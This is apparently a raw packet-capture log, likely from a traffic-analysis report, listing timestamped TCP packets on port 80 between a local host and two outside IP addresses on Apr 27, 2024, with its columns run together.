                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.799851894 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.799854994 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.799894094 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.800368071 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.800412893 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.800451994 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.800504923 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.800606966 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.800647020 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.800649881 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.800690889 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.800730944 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.800775051 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.800839901 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.800884008 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.801100969 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.801139116 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.801177025 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.801218033 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.801219940 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.801260948 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.801263094 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.801301003 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.801341057 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.801378965 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.801383018 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.801419973 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.801745892 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.801786900 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.801826954 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.801867008 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.802166939 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.802206039 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.802206993 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.802870989 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.802962065 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.803004026 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.803011894 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.803042889 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.803045988 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.803085089 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.803124905 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.803148031 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.803164005 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.803167105 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.803184032 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.803186893 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.803206921 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.803225994 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.803231001 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.803244114 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.803262949 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.803278923 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.803308964 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.803313971 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.805037022 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.805057049 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.805075884 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.805099964 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.805111885 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.805284977 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.805356979 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.805376053 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.805413961 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.805418015 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.805437088 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.805454969 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.805470943 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.805557013 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.805574894 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.805593967 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.805594921 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.805615902 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806149006 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806168079 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806185961 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806207895 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806210041 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806224108 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806266069 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806301117 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806349993 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806370020 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806387901 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806406021 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806421995 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806430101 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806446075 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806454897 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806473017 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806490898 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806507111 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806508064 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806529045 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806531906 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806550980 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.806588888 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.848299026 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.848335028 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.848421097 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.857702971 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.857744932 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.857799053 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.900995970 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.901040077 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.901123047 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.946691990 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.946733952 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.946826935 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.947153091 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.947191954 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.947213888 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.947249889 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948066950 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948121071 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948139906 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948177099 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948201895 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948235989 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948256969 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948286057 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948314905 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948360920 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948376894 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948416948 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948451042 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948498964 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948513985 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948543072 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948570013 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948618889 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948635101 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948662996 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948708057 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948744059 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948781013 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948806047 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948829889 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948859930 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.948916912 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.994415998 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.994456053 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.994524002 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.994576931 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.994653940 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.994692087 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.994715929 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.994729042 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.994766951 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.994805098 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.994808912 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.994843006 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.994843006 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.994904041 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.994939089 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.994976997 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.994982004 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995014906 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995018959 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995055914 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995095015 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995136976 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995145082 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995177031 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995178938 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995215893 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995254040 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995290995 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995295048 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995327950 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995328903 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995367050 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995454073 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995492935 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995501041 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995532036 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995538950 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995570898 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995609999 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995646954 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995655060 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995685101 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995686054 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.995851994 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.996167898 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.996206045 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.996215105 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.996247053 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.996247053 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.996284962 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.996321917 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.996361017 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.996366024 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.996401072 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.996404886 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.996438980 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.996675014 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.996714115 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.996720076 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.996757030 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.996819973 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.996961117 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.997023106 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.998038054 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.998078108 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.998116970 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.998155117 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.998161077 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.998193026 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.998199940 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.998233080 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.998270988 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.998306990 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.998323917 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.998344898 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.998349905 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.998383999 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.998420954 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.998459101 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.998467922 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.998497009 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.998500109 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.998536110 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.998574972 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.998619080 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.999609947 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.999650002 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.999655008 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.999687910 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.999727964 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.999766111 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.999771118 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.999804974 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.999805927 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.999842882 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.999881029 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.999926090 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:19.999985933 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.000027895 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.000030994 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.000118971 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.000155926 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.000200033 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.000690937 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.000730038 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.000735998 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.000768900 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.000808954 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.000809908 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.000845909 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.000880957 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.000883102 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.001328945 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.001368046 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.001370907 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.001408100 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.001444101 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.001446962 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.001485109 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.001521111 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.001524925 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.001564026 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.001602888 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.001606941 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.001641989 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.001679897 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:20.001683950 CEST8049734176.97.76.106192.168.2.4
